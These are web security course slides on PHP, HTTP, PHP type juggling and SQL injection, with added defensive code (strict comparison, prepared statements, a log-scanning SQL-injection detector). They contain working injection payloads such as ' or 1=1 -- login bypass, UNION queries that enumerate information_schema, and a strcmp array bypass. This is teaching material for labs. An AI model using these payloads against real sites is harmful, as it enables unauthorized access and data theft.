Slide 1

IM620 Web Security

Slide 2

Basic PHP

Slide 3

Basic PHP

• A language for developing dynamic web pages
• Runs on the server and sends the result to the client
• Examples:
  • WordPress
  • Facebook
  • CDX

Slide 4

Basic PHP

• Variables
  • Every variable name is prefixed with $
• HTTP GET / POST
  • $_GET
  • $_POST
• Arrays

Slide 5

HTTP: HyperText Transfer Protocol

Slide 6

HTTP

• HTTP is stateless
• Usually runs over the TCP protocol
• Defines eight request methods
• Defines response status codes
• Historical versions:
  • HTTP 1.0
  • HTTP 1.1
  • HTTP 2.0

Slide 7

HTTP Headers

Slides 8-12

HTTP Header (Request)

    GET / HTTP/1.1
    Host: racterub.me
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:82.0) Gecko/20100101 Firefox/82.0
    Accept: text/html,
    Accept-Language: zh-TW,zh;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Connection: close
    Upgrade-Insecure-Requests: 1

The slides annotate the request one part at a time:
• GET: the HTTP method (request method)
• /: the request path (location of the resource)
• HTTP/1.1: the HTTP protocol version (1.1, 1.2, 2)
• Host: the site being accessed (domain/IP + port)
• User-Agent: identifies the operating system and the client (browser)

Slides 13-15

HTTP Header (Response)

    HTTP/1.1 200 OK
    Server: nginx
    Date: Sun, 27 Sep 2020 10:44:42 GMT
    Content-Type: text/html; charset=utf-8
    Last-Modified: Tue, 04 Aug 2020 16:24:02 GMT
    Connection: close
    ETag: W/"5f298ba2-8a3"
    Content-Length: 2211
    ...

The slides annotate the response in three parts:
• Status code: the 200 OK on the first line
• Response header: the header lines that follow
• Body (text content): everything after the headers

Slides 16-19

HTTP Method

• GET: requests a representation of the specified resource
• POST: submits data to the specified resource (the submitted data travels in the request body)
• OPTIONS: asks the server to return all HTTP request methods the resource supports
• HEAD: the same as GET, but the response carries no body
• PUT: uploads the latest content to the specified resource location
• DELETE: asks the server to delete the resource identified by the Request-URI
• CONNECT: reserved for proxy servers that can switch the connection into a tunnel (HTTP 1.1)
• TRACE: echoes back the request the server received; mainly used for testing or diagnostics

Slide 20

HTTP Status Codes

• 200: success
• 300: redirection
• 400: client error
• 500: server error

Slide 21

URL: Uniform Resource Locator

Slides 22-23

URL

    scheme://User@Domain:Port/Path?Query#Fragment

Example from the slide:

    https://[email protected]:443/shell?cmd=ls#output

Slide 24

Ports

Slide 25

Ports

• Defined in TCP/IP
• Ports range from 1 to 65535
• IANA assigns purposes to some ports (but users can define their own)

Slide 26

Ports

• 21: FTP
• 22: SSH
• 23: Telnet
• 80: HTTP
• 443: HTTPS
• 3306: MySQL
• 3389: RDP

Slides 27-30

Basic PHP: GET / POST data

• ?a=1&b=2 read through $_GET: $a = 1, $b = 2
• ?a=1&b=2 read through $_POST: $a = 1, $b = 2
• ?a[]=1&a[]=2&a[]=3 read through $_GET: $a = Array(1,2,3)
• a[]=1&a[]=2&a[]=3 read through $_POST: $a = Array(1,2,3)

Slide 31

Lab: Basic PHP

Slides 32-38

Basic PHP: weak typing

• '87' == 87 ? → True
• '1e5' == 100e3 ? → True
• NULL == 0 == False ? → True
• '123' + '456' ? → '579'
• '123' . '456' ? → '123456'

Slides 39-45

Basic PHP: Example (the slide content is an image that was not captured in this text)

Slide 46

Well, PHP code these days has all switched to === and !== anyway.
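As an added example (not from the slides), the quiz expressions above run under both == and ===, followed by a secret-comparison helper that refuses to coerce types. tokenMatches() is this example's own name; it needs PHP 7.1 or later.

```php
<?php
// Added example, not from the slides: the quiz expressions under loose (==) and
// strict (===) comparison, plus a comparison helper that never coerces types.

// [left operand, right operand, label]: the slides' own quiz items.
$cases = [
    ['87',  87,    "'87' == 87"],
    ['1e5', 100e3, "'1e5' == 100e3"],   // numeric string vs float: 100000 == 100000.0
    [null,  0,     "NULL == 0"],
    [0,     false, "0 == false"],
    [null,  false, "NULL == false"],
];
foreach ($cases as [$a, $b, $label]) {
    printf("%-16s ==: %-5s ===: %s\n", $label,
        var_export($a == $b, true), var_export($a === $b, true));
}
// Every row prints "==: true" but "===: false": === compares type as well as value.

var_dump('123' + '456');   // int(579): '+' converts both numeric strings to numbers
var_dump('123' . '456');   // string(9) "123456": '.' always concatenates

// Defensive pattern: a secret check that rejects anything but a string, then
// compares strictly. hash_equals() is both strict and constant-time, so it is the
// right primitive for secrets; plain === would also stop the type juggling above.
function tokenMatches($submitted, string $expected): bool
{
    if (!is_string($submitted)) {   // ints, NULL and arrays (?token[]=) are refused outright
        return false;
    }
    return hash_equals($expected, $submitted);
}

var_dump(tokenMatches('1e5', '100000'));  // false: '1e5' == '100000' would be true
var_dump(tokenMatches(87, '87'));         // false: no int-to-string coercion
var_dump(tokenMatches('87', '87'));       // true
```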

Slide 47

But PHP still has one more hip, cool little thing.

Slides 48-51

Array 🌚

• md5([]) → NULL
• strcmp([], []) → NULL
• sha1([]) → NULL

Slides 52-55

Array 🌚: Example (the slide content is an image that was not captured in this text)
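As an added example (not from the slides), the NULL result above combined with slide 34's NULL == 0 in a strcmp()-style password check, beside the string guard that closes it. loginLoose() and loginStrict() are this example's own names, and the sample password is constructed; the array-returns-NULL behaviour is PHP 7's, PHP 8 throws a TypeError for the same call, which the code also handles.

```php
<?php
// Added example, not from the slides. No declare(strict_types=1) here on purpose:
// in coercive mode PHP 7 lets strcmp() receive an array, warns, and returns NULL
// (the slides' md5([]) / sha1([]) / strcmp([], []) -> NULL). PHP 8 throws TypeError.

$realPassword = 'yz1234';   // constructed sample secret (the slides' yzu user)

// Slide-style check. For ?pass[]=1, $_POST['pass'] is an array, strcmp() returns NULL,
// and NULL == 0 is True (slide 34): the comparison passes without knowing the password.
function loginLoose($submitted, string $real): bool
{
    try {
        return strcmp($submitted, $real) == 0;   // NULL == 0 -> true on PHP 7
    } catch (TypeError $e) {
        return false;                           // PHP 8: array argument throws
    }
}

// Hardened check: reject non-strings first, then compare strictly and in constant time.
function loginStrict($submitted, string $real): bool
{
    if (!is_string($submitted)) {
        return false;
    }
    return hash_equals($real, $submitted);
}

// Constructed inputs: the right password, a wrong one, and what ?pass[]=1 produces.
foreach (['yz1234', 'wrong', ['1']] as $submitted) {
    printf("%-10s loose: %-5s strict: %s\n", json_encode($submitted),
        var_export(loginLoose($submitted, $realPassword), true),
        var_export(loginStrict($submitted, $realPassword), true));
}
// PHP 7 prints a warning for the array row and reports loose: true, strict: false.
// PHP 8 reports loose: false because the TypeError is caught; strict is the same on both.
```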

Slide 56

Lab: PHP sucks

Slide 57

SQL Injection

Slide 58

SQL: Login

The login page sits in front of two tables, users and admins, both shown on the slide with the same rows:

    id  username  password
    1   test      test
    2   admin     1234
    3   yzu       yz1234
    4   itac      itac

Slides 59-64

SQL: queries against the users table

    SELECT * FROM users;
    SELECT * FROM users WHERE username='admin';
    SELECT id, password FROM users WHERE username='admin';
    SELECT * FROM users LIMIT 0,1;
    SELECT * FROM users LIMIT 1,3;

    id  username  password
    1   test      test
    2   admin     1234
    3   yzu       yz1234
    4   itac      itac

Slides 65-66

SQL injection

    if (isset($_GET['user']) || isset($_GET['pass'])) {
        $sql = "SELECT id FROM user WHERE username='".$_GET['user']."' AND password='".$_GET['pass']."'";
        $result = $connection->query($sql);
        if ($result) {
            $data = $result->fetch(PDO::FETCH_ASSOC);
            if ($data) {
                die("success");
            } else {
                die("failed");
            }
        } else {
            die("error");
        }
    }

Slides 67-70

SQL injection

The query is built by concatenating the request parameters straight into the SQL string:

    SELECT id FROM user WHERE username='".$_GET['user']."' AND password='".$_GET['pass']."'";

• user = admin, pass = admin
    SELECT id FROM user WHERE username='admin' AND password='admin';
• user = admin'; pass = admin
    SELECT id FROM user WHERE username='admin';' AND password='admin';
• user = ' or 1=1 --+ pass = admin
    SELECT id FROM user WHERE username='' or 1=1 -- ' AND password='admin';

Slide 71

So SQL injection usually shows up where queries are built by concatenating SQL strings.
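As an added example (not from the slides), the login check rewritten with a PDO prepared statement so the query's structure is fixed before any input reaches it. lookupUserId() is this example's own name; the table and column names follow the slides, and an in-memory SQLite database with constructed rows stands in for MySQL so it runs stand-alone.

```php
<?php
// Added example, not from the slides: the login query with parameters bound by the driver.
declare(strict_types=1);

function lookupUserId(PDO $connection, $user, $pass): ?int
{
    // Only plain strings are acceptable: ?user[]=x arrives as an array, and an absent
    // parameter (the slides' || test lets one be missing) must not turn into "".
    if (!is_string($user) || !is_string($pass)) {
        return null;
    }
    // The SQL text is a constant. The values travel separately as parameters, so a
    // quote in $user cannot close the literal and "or 1=1 --" stays an ordinary username.
    $stmt = $connection->prepare(
        'SELECT id FROM user WHERE username = :user AND password = :pass'
    );
    $stmt->execute([':user' => $user, ':pass' => $pass]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : (int) $row['id'];
}

// Stand-in database with the slides' first two rows (constructed, not the lab's data).
$connection = new PDO('sqlite::memory:');
$connection->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$connection->exec('CREATE TABLE user (id INTEGER PRIMARY KEY, username TEXT, password TEXT)');
$connection->exec("INSERT INTO user (username, password) VALUES ('test', 'test'), ('admin', '1234')");

var_dump(lookupUserId($connection, 'admin', '1234'));         // int(2)
var_dump(lookupUserId($connection, 'admin', 'admin'));        // NULL: wrong password
var_dump(lookupUserId($connection, "' or 1=1 -- ", 'admin')); // NULL: slide 70's input is now just a literal
var_dump(lookupUserId($connection, ['admin'], '1234'));       // NULL: array input refused
// Storing plaintext passwords, as the slides' table does, is a separate problem:
// real code stores password_hash() output and checks it with password_verify().
```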

Slide 72

Lab: Web3 Login as admin

Slide 73

Types of SQL injection

• Union-based
  • A UNION query replaces the data the original query would have returned, so the page displays the data fetched by the SQL you constructed
• Boolean-based
  • When guessing characters, compare them by ASCII value and extract the data through True / False responses
• Time-based
  • Use the Boolean-based approach and add a sleep on top

Slides 74-77

SQL: UNION queries against the users table

    SELECT * FROM users WHERE id=1;

    id  username  password
    1   test      test
    2   admin     1234
    3   yzu       yz1234
    4   itac      itac

    SELECT * FROM users WHERE id=1 UNION SELECT 1,2,3;

    id  username  password
    1   test      test
    2   admin     1234
    3   yzu       yz1234
    4   itac      itac
    1   2         3

    SELECT * FROM users WHERE id=-1 UNION SELECT 1,2,3;

    id  username  password
    1   2         3

    SELECT * FROM users WHERE id=-1 UNION SELECT 1,user(),3;

    id  username        password
    1   root@localhost  3

Slides 78-81

MySQL

• information_schema
  • Stores the database's metadata
  • Database Name: information_schema.schemata
  • Table Name: information_schema.tables
  • Column Name: information_schema.columns

Slides 82-86

SQL: reading information_schema through the UNION

    SELECT * FROM users WHERE id=-1 UNION SELECT 1,schema_name,3 FROM information_schema.schemata;

    id  username  password
    1   login     3

    SELECT * FROM users WHERE id=-1 UNION SELECT 1,table_name,3 FROM information_schema.tables WHERE table_schema='login';

    id  username  password
    1   users     3

    SELECT * FROM users WHERE id=-1 UNION SELECT 1,column_name,3 FROM information_schema.columns WHERE table_name='users';

    id  username  password
    1   id        3

    SELECT * FROM users WHERE id=-1 UNION SELECT 1,column_name,3 FROM information_schema.columns WHERE table_name='users' limit 1,1;

    id  username  password
    1   username  3

    SELECT * FROM users WHERE id=-1 UNION SELECT 1,group_concat(column_name),3 FROM information_schema.columns WHERE table_name='users';

    id  username        password
    1   id, user, pass  3
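As an added example (not from the slides), a log-review heuristic that flags the query shapes the UNION and information_schema slides walk through when they appear in web-server access logs. The function names, pattern set and log lines are this example's own and the log lines are constructed; it is a triage aid for hunting in logs, not a substitute for prepared statements.

```php
<?php
// Added example, not from the slides: flag the query shapes the slides walk through
// (UNION SELECT, information_schema reads, "--" terminators, sleep()) in access-log
// query strings. A log-review triage aid, not a filter: keyword matching is easy to
// evade, and the application-side fix remains prepared statements.

const SQLI_PATTERNS = [   // applied to the URL-decoded, whitespace-collapsed query string
    'union-based'        => '/\bunion\b[\s\/*]+(?:all\s+)?select\b/i',
    'schema-enumeration' => '/\binformation_schema\s*\.\s*(?:schemata|tables|columns)\b/i',
    'comment-terminator' => '/--(?:\s|$)|\/\*/',
    'tautology'          => '/\bor\b\s+(\w+)\s*=\s*\1\b/i',
    'time-based'         => '/\b(?:sleep|benchmark)\s*\(/i',
];

// Pull the query string out of a combined-log-format request field, or null if none.
function queryStringFromLogLine(string $line): ?string
{
    if (!preg_match('/"(?:GET|POST) (\S+) HTTP\/[\d.]+"/', $line, $m)) {
        return null;
    }
    $query = parse_url($m[1], PHP_URL_QUERY);
    // urldecode() turns %20 and '+' (the slides' "--+") back into spaces; collapsing
    // whitespace runs stops "UNION   SELECT" from slipping past the patterns.
    return is_string($query) ? preg_replace('/\s+/', ' ', urldecode($query)) : null;
}

// Names of the patterns a line matches; an empty array means nothing was flagged.
function classifyLogLine(string $line): array
{
    $query = queryStringFromLogLine($line) ?? '';   // no query string: nothing to match
    $hits = [];
    foreach (SQLI_PATTERNS as $name => $regex) {
        if (preg_match($regex, $query)) {
            $hits[] = $name;
        }
    }
    return $hits;
}

// Constructed log lines (not real traffic); the payloads are the slides' own inputs.
$logLines = [
    '203.0.113.5 - - [27/Sep/2020:10:44:42 +0000] "GET /login?user=admin&pass=1234 HTTP/1.1" 200 512',
    '203.0.113.5 - - [27/Sep/2020:10:44:51 +0000] "GET /login?user=%27%20or%201%3D1%20--+&pass=admin HTTP/1.1" 200 512',
    '203.0.113.5 - - [27/Sep/2020:10:45:03 +0000] "GET /blog?id=-1%20UNION%20SELECT%201,user(),3 HTTP/1.1" 200 2211',
    '203.0.113.5 - - [27/Sep/2020:10:45:09 +0000] "GET /blog?id=-1%20UNION%20SELECT%201,table_name,3%20FROM%20information_schema.tables HTTP/1.1" 200 2211',
];
foreach ($logLines as $line) {
    $hits = classifyLogLine($line);
    printf("%-36s %s\n", $hits ? implode(',', $hits) : 'clean', $line);
}
```

The first line reports clean, the second comment-terminator and tautology, the third union-based, and the fourth union-based and schema-enumeration.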

Slide 87

Lab: Web3 Blog

Slide 88

Bonus Web: Login as admin - advanced

Slide 89

Bonus Web 🐚 🐚 🐚 🐚